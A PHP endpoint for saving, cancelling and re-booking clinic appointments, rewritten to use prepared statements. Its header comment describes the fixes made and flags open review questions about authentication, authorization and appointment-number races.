name :
manage_appointment.php
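<?php
/**
 * Appointment endpoint: reads the posted form fields, performs the operation
 * named in `btnopration`, and echoes a JSON-encoded status string.
 *
 * Status strings (unchanged from the original):
 *   "1" appointment saved
 *   "2" appointment cancelled (isdeleted set to 1)
 *   "3" appointment re-booked (isdeleted set to 0)
 *   "4" an active appointment already exists for this uhid / date / consultant
 *   ""  nothing was done (unknown operation, "UpdateAppointment", or a query failed)
 *
 * Changes from the original:
 *   - Every query is a prepared statement with bound parameters. The original
 *     concatenated $_POST values straight into the SQL text, so any field could
 *     alter the statement (SQL injection).
 *   - The creation timestamp uses "i" (minutes); the original "H:m:s" wrote the
 *     month number in the minutes position.
 *   - Missing or non-scalar POST fields are read as '' instead of raising notices.
 *   - The token lookups against tokenregistertb were removed: their result was
 *     stored in a local and never used.
 *   - The appointment-number count runs only for "SaveAppointment", the one
 *     operation that uses it, and a failed count no longer leads to an insert.
 *
 * NOTE(review): nothing in this script checks that a user is logged in; the
 * session userid is stored with the row but never validated. Confirm whether
 * anonymous access is intended and, if not, reject requests without a session.
 * NOTE(review): cancel / re-book act on whatever `appid` is posted; no
 * ownership or role check is visible here, so confirm authorization is
 * enforced somewhere before this runs.
 * NOTE(review): appno is derived as count + 1 with no lock or unique key
 * visible, so two concurrent saves can get the same number.
 */
require_once "config.php";
session_start();

$userid = isset($_SESSION['userid']) ? $_SESSION['userid'] : '';

// Read one POST field as a string; absent or array-valued fields become ''.
$field = function ($key) {
    return (isset($_POST[$key]) && is_scalar($_POST[$key])) ? (string) $_POST[$key] : '';
};

// Prepare, bind and execute a statement. Returns the executed statement, or false on failure.
$run = function ($sql, $types, array $params) use ($conn) {
    $stmt = mysqli_prepare($conn, $sql);
    if ($stmt === false) {
        return false;
    }
    if (!mysqli_stmt_bind_param($stmt, $types, ...$params) || !mysqli_stmt_execute($stmt)) {
        mysqli_stmt_close($stmt);
        return false;
    }
    return $stmt;
};

// Run a single-column count query. Returns the count as int, or null on failure.
$countRows = function ($sql, $types, array $params) use ($run) {
    $stmt = $run($sql, $types, $params);
    if ($stmt === false) {
        return null;
    }
    $count = 0;
    mysqli_stmt_bind_result($stmt, $count);
    $fetched = mysqli_stmt_fetch($stmt);
    mysqli_stmt_close($stmt);
    return $fetched ? (int) $count : null;
};

// Run an INSERT/UPDATE. Returns true when the statement executed.
$write = function ($sql, $types, array $params) use ($run) {
    $stmt = $run($sql, $types, $params);
    if ($stmt === false) {
        return false;
    }
    mysqli_stmt_close($stmt);
    return true;
};

$presirname        = $field('presirname');
$patientname       = $field('patientname');
$mobileno          = $field('mobileno');
$age               = $field('age');
$ageinyear         = $field('ageinyear');
$gender            = $field('gender');
$dateofappointment = $field('dateofappointment');
$consultant        = $field('consultant');
$patienttype       = $field('patienttype');
$uhid              = $field('uhid');
$appid             = $field('appid');
$btnopration       = $field('btnopration');

$creationdatetime = date("Y-m-d H:i:s");
$message = "";

if ($btnopration === "SaveAppointment") {
    // Next appointment number = active appointments for this consultant on this date, plus one.
    $booked = $countRows(
        "select count(0) from appointmenttb where appdate=? and consultantid=? and isdeleted='0'",
        'ss',
        [$dateofappointment, $consultant]
    );

    if ($booked !== null) {
        $appno = $booked + 1;

        if ($patienttype === "Yes") {
            // New patient: no uhid yet, NeworOld carries the posted value ("Yes").
            $saved = $write(
                "INSERT INTO appointmenttb(regid,appno,presirname,name,age,ageinyear,gender,mobileno,appdate,consultantid,paymentstatus,NeworOld,isdeleted,creationdatetime,userid) "
                . "VALUES('0',?,?,?,?,?,?,?,?,?,0,?,'0',?,?)",
                'i' . str_repeat('s', 11),
                [$appno, $presirname, $patientname, $age, $ageinyear, $gender, $mobileno,
                 $dateofappointment, $consultant, $patienttype, $creationdatetime, $userid]
            );
            if ($saved) {
                $message = "1";
            }
        } else {
            // Existing patient: refuse a second active appointment for the same uhid / date / consultant.
            $existing = $countRows(
                "select count(0) from appointmenttb where uhid=? and appdate=? and consultantid=? and isdeleted='0'",
                'sss',
                [$uhid, $dateofappointment, $consultant]
            );

            if ($existing === 0) {
                $saved = $write(
                    "INSERT INTO appointmenttb(regid,uhid,appno,presirname,name,age,ageinyear,gender,mobileno,appdate,consultantid,paymentstatus,NeworOld,isdeleted,creationdatetime,userid) "
                    . "VALUES('0',?,?,?,?,?,?,?,?,?,?,0,'No','0',?,?)",
                    'si' . str_repeat('s', 10),
                    [$uhid, $appno, $presirname, $patientname, $age, $ageinyear, $gender, $mobileno,
                     $dateofappointment, $consultant, $creationdatetime, $userid]
                );
                if ($saved) {
                    $message = "1";
                }
            } elseif ($existing !== null) {
                $message = "4";
            }
        }
    }
} elseif ($btnopration === "UpdateAppointment") {
    // Not implemented in the original; the response stays "".
} elseif ($btnopration === "Cancel Appointment") {
    // Soft delete: the row is kept and flagged.
    if ($write("update appointmenttb set isdeleted=1 where appid=?", 's', [$appid])) {
        $message = "2";
    }
} elseif ($btnopration === "Booked Appointment") {
    // Reverse a cancellation.
    if ($write("update appointmenttb set isdeleted=0 where appid=?", 's', [$appid])) {
        $message = "3";
    }
}

echo json_encode($message);
?>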